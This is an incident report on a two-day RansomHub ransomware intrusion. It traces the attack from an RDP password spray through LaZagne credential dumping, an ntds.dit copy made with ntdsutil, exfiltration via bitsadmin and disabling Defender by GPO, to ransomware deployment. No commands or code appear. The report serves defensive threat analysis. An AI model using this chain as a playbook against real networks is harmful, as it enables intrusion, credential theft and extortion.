A recent cyber incident demonstrated how a publicly exposed Remote Desktop Protocol (RDP) service led to the deployment of RansomHub ransomware across a network. The threat actor initiated the attack by conducting a password spray against an internet-facing RDP server, successfully compromising a user account that was protected by a weak password.

The entire intrusion, from initial access to ransomware deployment, occurred over a two-day period. This case highlights a rapid and effective attack chain utilizing common system administration tools and publicly available software to achieve its objectives.

Initial Access and Lateral Movement

Upon gaining initial access via RDP, the attacker immediately began reconnaissance activities. The actor used built-in Windows commands, such as net.exe, to enumerate domain users and identify members of the “domain admins” group. To map the internal network, the threat actor downloaded and ran the legitimate network scanning tool, Advanced IP Scanner.

Following the network scan, the attacker used a credential harvesting tool identified as LaZagne to dump credentials from the initially compromised host. With these harvested credentials, the actor was able to move laterally through the network, connecting to a domain controller via RDP. This move gave the attacker high-level privileges and access to critical infrastructure.

Data Exfiltration and Ransomware Deployment

Once on the domain controller, the threat actor focused on data theft. They used the native Windows utility ntdsutil.exe to create an Install From Media (IFM) copy of the Active Directory database (ntds.dit). This file, containing user account information and password hashes, was then compressed using 7-Zip. For exfiltration, the attacker used another standard Windows tool, bitsadmin.exe, to transfer the compressed database to an external server.

As a final preparatory step, the actor disabled Microsoft Defender Antivirus across the domain. This was accomplished by creating and applying a new Group Policy Object (GPO) that modified registry keys to turn off the security software. On the second day, the attacker executed a batch script to deploy the RansomHub ransomware payload, which proceeded to encrypt files and deliver ransom notes to the victim.